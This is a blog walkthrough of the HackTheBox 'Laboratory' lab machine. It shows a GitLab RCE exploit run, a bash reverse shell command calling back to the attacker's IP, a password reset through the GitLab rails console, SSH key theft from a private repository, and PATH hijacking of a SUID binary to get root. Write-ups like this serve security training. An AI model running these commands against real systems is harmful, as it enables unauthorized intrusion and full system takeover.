This page looks best with JavaScript enabled

HackTheBox: Laboratory

 ·  ☕ 3 min read

Foothold

[jusepe@nix:~/Documents/HackTheBox/Laboratory/recon]$ sudo scan laboratory.htb
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 80,22,443
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
|   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp  open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn: 
|_  http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
         TTL: 0
         Furious: 132
         Nmap: 20

From the landing page it seems that it is just a static website.

Landing page

However there is a VHOST as nmap suggests, which is hosting a gitlab server with the following version:

Gitlab version

So used a exploit to get RCE from github:

[jusepe@nix:~/Documents/HackTheBox/Laboratory/exploits]$ python3 gitlab_rce.py https://git.laboratory.htb/ 10.10.15.193
Gitlab Exploit by dotPY [insert fancy ascii art]
registering DN80vPngRX:aIZiOH1BwY - 200
Getting version of https://git.laboratory.htb/ - 200
The Version seems to be 12.8.1! Choose wisely
delete user DN80vPngRX - 200
[0] - GitlabRCE1147 - RCE for Version <=11.4.7
[1] - GitlabRCE1281LFIUser - LFI for version 10.4-12.8.1 and maybe more
[2] - GitlabRCE1281RCE - RCE for version 12.4.0-12.8.1 - !!RUBY REVERSE SHELL IS VERY UNRELIABLE!! WIP
type a number and hit enter to choose exploit: 2
Start a listener on port 42069 and hit enter (nc -vlnp 42069)
registering u1WsnWlcdu:PTQjQKzbEn - 200
creating project zAVpP0WEYB - 200
creating project zWHURuFZHz - 200
creating issue 3VawqGLTlk for project zAVpP0WEYB - 200
moving issue from zAVpP0WEYB to zWHURuFZHz - 200
Grabbing file secrets.yml
deploying payload - 500

However the ruby terminal is unstable so created a bash reverse shell in /tmp to work in a more comfortable way:

[jusepe@nix:~]$ rlwrap nc -lvnp 42069
listening on [any] 42069 ...
connect to [10.10.15.193] from (UNKNOWN) [10.10.10.216] 38278
echo "bash -i >& /dev/tcp/10.10.15.193/8888 0>&1" > /tmp/reverse.sh
chmod +x /tmp/reverse.sh
bash /tmp/reverse.sh

User

In the gitlab page there was only one member which is dexter the same as the local user in the machine:

Dexter

So thought of resetting his password following this guide:

(remote) git@git.laboratory.htb:/$ gitlab-rails console -e production
--------------------------------------------------------------------------------
 GitLab:       12.8.1 (d18b43a5f5a) FOSS
 GitLab Shell: 11.0.0
 PostgreSQL:   10.12
--------------------------------------------------------------------------------
Loading production environment (Rails 6.0.2)
irb(main):001:0> user = User.where(id: 1).first
=> #<User id:1 @dexter>
irb(main):002:0> user.password = 'secret_pass'
=> "secret_pass"
irb(main):003:0> user.password_confirmation = 'secret_pass'
=> "secret_pass"
irb(main):004:0> user.save!
Enqueued ActionMailer::DeliveryJob (Job ID: 2bb9a4ed-40f7-4130-8b55-25257191ef03) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<GlobalID:0x00007f4cca2677d0 @uri=#<URI::GID gid://gitlab/User/1>>
=> true
irb(main):005:0> 

After logging to his website there is a private repository that contains an id_rsa that we can use with SSH:
Private repo

Root

In order to escalate privileges to root checked the SUID binaries:
Suid

There was one binary that haven’t seen before, docker-security. Ran strings on the binary to figure out what it does, and found that is vulnerable to PATH Hijacking

[jusepe@nix:~/Documents/HackTheBox/Laboratory/privesc]$ strings docker-security 
/lib64/ld-linux-x86-64.so.2
setuid
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
chmod 700 /usr/bin/docker
chmod 660 /var/run/docker.sock
;*3$"
GCC: (Debian 10.1.0-6) 10.1.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
docker-security.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

So modified the PATH and created a script that gets me a bash terminal when executed

dexter@laboratory:/tmp$ echo "/bin/bash" > chmod
dexter@laboratory:/tmp$ /bin/chmod 777 chmod
dexter@laboratory:/tmp$ export PATH=/tmp:$PATH
dexter@laboratory:/tmp$ docker-security 
root@laboratory:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1000(dexter)
Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover